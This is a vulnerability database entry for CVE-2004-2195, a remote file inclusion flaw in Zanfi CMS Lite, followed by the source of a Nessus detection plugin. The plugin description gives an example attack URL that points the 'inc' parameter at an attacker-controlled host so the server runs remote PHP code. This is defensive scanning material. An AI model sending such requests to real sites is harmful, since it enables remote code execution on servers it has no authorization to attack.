Vulnerabilities > CVE-2004-2195 - Unspecified vulnerability in Zanfi Solutions Zanfi CMS Lite 1.1

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN
zanfi-solutions
nessus
NVD
Published: 2004-12-31
Updated: 2024-11-20

Summary

PHP remote file inclusion vulnerability in index.php in Zanfi CMS lite 1.1 allows remote attackers to execute arbitrary PHP code via the inc parameter.

Vulnerable Configurations

Part Description Count
Application
Zanfi_Solutions
1

Nessus

NASL familyCGI abuses
NASL idZANFI_CMS_FILE_INCLUDE.NASL
descriptionThe remote host is running Zanfi CMS Lite, a content management system written in PHP. There is a bug in the remote version of this software that may allow an attacker to execute arbitrary commands on the remote host by using a file inclusion bug in the file
last seen2020-06-01
modified2020-06-02
plugin id15452
published2004-10-11
reporterThis script is Copyright (C) 2004-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/15452
titleZanfi CMS Lite index.php inc Parameter Remote File Inclusion
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if (description)
{
  script_id(15452);
  script_version ("1.20");
  script_cve_id("CVE-2004-2195");
  script_bugtraq_id(11362);

  script_name(english:"Zanfi CMS Lite index.php inc Parameter Remote File Inclusion");
  script_summary(english:"Determines if Zanfi CMS can include third-party files");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is prone to arbitrary
PHP code execution and file disclosure attacks." );
  script_set_attribute(attribute:"description", value:
"The remote host is running Zanfi CMS Lite, a content management system
written in PHP. 

There is a bug in the remote version of this software that may allow
an attacker to execute arbitrary commands on the remote host by using
a file inclusion bug in the file 'index.php'. 

An attacker may execute arbitrary commands by requesting :

  http://www.example.com/index.php?inc=http://[evilsite]/commands

This will make the remote script include the file 'commands.php' and
execute it." );
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/378053" );
  script_set_attribute(attribute:"solution", value:"Unknown at this time." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2004-2195");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"plugin_publication_date", value: "2004/10/11");
  script_set_attribute(attribute:"vuln_publication_date", value: "2004/10/11");
  script_cvs_date("Date: 2019/06/03 10:01:42");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");
  script_copyright(english:"This script is Copyright (C) 2004-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_dependencie("http_version.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_keys("www/PHP");
  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);

if(!can_host_php(port:port))exit(0);

foreach d (cgi_dirs())
{
 url = string(d, "/index.php?inc=http://example.com/foo");
 r = http_send_recv3(method: "GET", port:port, item: url);
 if (isnull(r) ) exit(0);
 if ( "getaddrinfo failed" >< r[2] )
 {
  security_hole(port);
  exit(0);
 }
}

References